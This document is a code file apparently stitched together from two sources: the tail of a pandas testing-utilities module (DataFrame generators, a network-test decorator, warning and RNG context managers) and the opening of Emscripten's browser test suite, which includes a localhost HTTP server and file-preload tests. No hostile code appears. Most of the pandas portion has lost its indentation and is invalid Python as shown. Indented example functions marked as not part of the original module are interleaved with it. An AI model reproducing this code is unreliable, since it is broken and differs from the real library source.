        N < idx_nlevels, for just the first N levels. If ndupe doesn't evenly
        divide nrows/ncols, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
        have more control in conjunction with a custom `data_gen_f`.
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, the corresponding `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index,
        "dt" creates a datetime index,
        "p" creates a period index,
        "td" creates a timedelta index.
        If unspecified, string labels will be generated.
    Examples
    --------
    # 5 rows, 3 columns, default names on both, single index on both axes
    >> makeCustomDataframe(5, 3)

    # make the data a random int between 1 and 100
    >> makeCustomDataframe(5, 3, data_gen_f=lambda r, c: randint(1, 100))

    # 2-level multiindex on rows with each label duplicated twice on the
    # first level, default names on both axes, single index on columns
    >> a = makeCustomDataframe(5, 3, r_idx_nlevels=2, r_ndupe_l=[2])

    # DatetimeIndex on rows, index with unicode labels on columns,
    # no names on either axis
    >> a = makeCustomDataframe(5, 3, c_idx_names=False, r_idx_names=False,
                               r_idx_type="dt", c_idx_type="u")

    # 4-level multiindex on rows with names provided, 2-level multiindex
    # on columns with default labels and default names
    >> a = makeCustomDataframe(5, 3, r_idx_nlevels=4,
                               r_idx_names=["FEE", "FI", "FO", "FAM"],
                               c_idx_nlevels=2)

    >> a = makeCustomDataframe(5, 3, r_idx_nlevels=2, c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
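# Illustrative usage (added for exposition, not part of the original module):
# a 3x2 frame filled by a custom generator; row/column labels get the
# default "R"/"C" prefixes from makeCustomIndex.
def _example_make_custom_dataframe():
    df = makeCustomDataframe(3, 2, data_gen_f=lambda r, c: r * 10 + c)
    assert df.shape == (3, 2)
    assert df.iloc[2, 1] == 21
    return df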
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
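# Illustrative usage (added for exposition, not part of the original module):
# with density=0.9, roughly 10% of the nrows*ncols cells are selected for
# blanking, and the returned row/column positions stay in bounds.
def _example_create_missing_idx():
    i, j = _create_missing_idx(20, 10, density=0.9, random_state=42)
    assert len(i) == len(j) == int(np.round(0.1 * 20 * 10))
    assert all(0 <= r < 20 for r in i) and all(0 <= c < 10 for c in j)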
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
    density : float, optional
        Float in (0, 1) that gives the fraction of non-missing values in
        the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
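# Illustrative usage (added for exposition, not part of the original module):
# a decorator built on optional_args can be applied bare or with keyword
# arguments; both spellings below are equivalent entry points.
@optional_args
def _example_tag(f, label="default"):
    @wraps(f)
    def inner(*args, **kwargs):
        return label, f(*args, **kwargs)
    return inner

@_example_tag
def _example_plain():
    return 1  # _example_plain() -> ("default", 1)

@_example_tag(label="custom")
def _example_labelled():
    return 2  # _example_labelled() -> ("custom", 2)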
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Neither of the above should mask real issues such as 404s
# or refused connections (changed DNS).
# But some tests (e.g. test_data yahoo) contact incredibly flaky
# servers, so we also conditionally raise on the exception types
# returned by _get_default_network_errors.
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
    Beyond simply labeling the test, this adds a contract: under normal
    conditions, your test should ONLY fail if it does not have network
    connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
    url : str
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
    * ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
    Errors raised inside tests decorated with @network are only re-raised if
    it's possible to make a network connection to another URL (defaults to
    google.com); otherwise the test is skipped::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
    Traceback (most recent call last):
        ...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
            if not errno and hasattr(err, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
    expected_warning : {Warning, False, None}, default Warning
        The type of warning to check for. ``Warning`` is the base
        class for all warnings. To check that no warning is raised,
        specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Restores
    the original RNG state upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
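# Illustrative usage (added for exposition, not part of the original module):
# identical seeds yield identical draws, and the surrounding global RNG
# state is restored once each block exits.
def _example_rng_context():
    with RNGContext(42):
        first = np.random.randn(3)
    with RNGContext(42):
        second = np.random.randn(3)
    assert (first == second).all()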
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
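# Illustrative usage (added for exposition, not part of the original module):
# temporarily register a pipe-delimited dialect; it is unregistered again
# when the block exits.
def _example_with_csv_dialect():
    import csv
    with with_csv_dialect("pipes", delimiter="|"):
        rows = list(csv.reader(["a|b", "1|2"], dialect="pipes"))
    assert rows == [["a", "b"], ["1", "2"]]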
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
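# Illustrative usage (added for exposition, not part of the original module):
# lowering min_elements forces the numexpr-accelerated path even for a
# frame far below the usual element threshold.
def _example_use_numexpr():
    df = DataFrame({"a": range(100)})
    with use_numexpr(True, min_elements=1):
        result = df + df
    return result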
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
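# Illustrative usage (added for exposition, not part of the original module):
# the decorator discards return values, so results are communicated through
# a shared structure; list.append is atomic under the GIL.
def _example_test_parallel():
    results = []

    @test_parallel(num_threads=4)
    def worker():
        results.append(1)

    worker()
    assert len(results) == 4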
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
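# Illustrative usage (added for exposition, not part of the original module):
# wrapping np.sum yields a reducer that ignores NaNs and returns NaN only
# for all-NaN input.
def _example_make_skipna_wrapper():
    wrapper = _make_skipna_wrapper(np.sum)
    assert wrapper(Series([1.0, np.nan, 2.0])) == 3.0
    assert np.isnan(wrapper(Series([np.nan, np.nan])))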
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
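# Illustrative usage (added for exposition, not part of the original module):
# the helper mirrors DataFrame.to_csv(), which terminates lines with
# os.linesep when producing a string.
def _example_convert_rows_list_to_csv_str():
    df = DataFrame({"a": [1, 2]})
    expected = convert_rows_list_to_csv_str([",a", "0,1", "1,2"])
    assert df.to_csv() == expected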
def external_error_raised(
expected_exception: Type[Exception],
) -> Callable[[Type[Exception], None], None]:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
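# Illustrative usage (added for exposition, not part of the original module):
# the exception type is asserted while the (externally controlled) message
# is deliberately left unmatched.
def _example_external_error_raised():
    with external_error_raised(ValueError):
        raise ValueError("wording comes from a third-party library")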
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
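# Illustrative sketch (added for exposition, not part of the original file):
# the chunked server above is normally launched in a separate process so a
# browser test can fetch byte ranges from localhost while the harness keeps
# running. The data, chunk size and port below are placeholder values.
def _example_start_chunked_server():
  data = b'0123456789' * 1024
  checksum = zlib.adler32(data)
  proc = multiprocessing.Process(
    target=test_chunked_synchronous_xhr_server,
    args=(True, 256, data, checksum, 8888))
  proc.start()
  return proc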
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
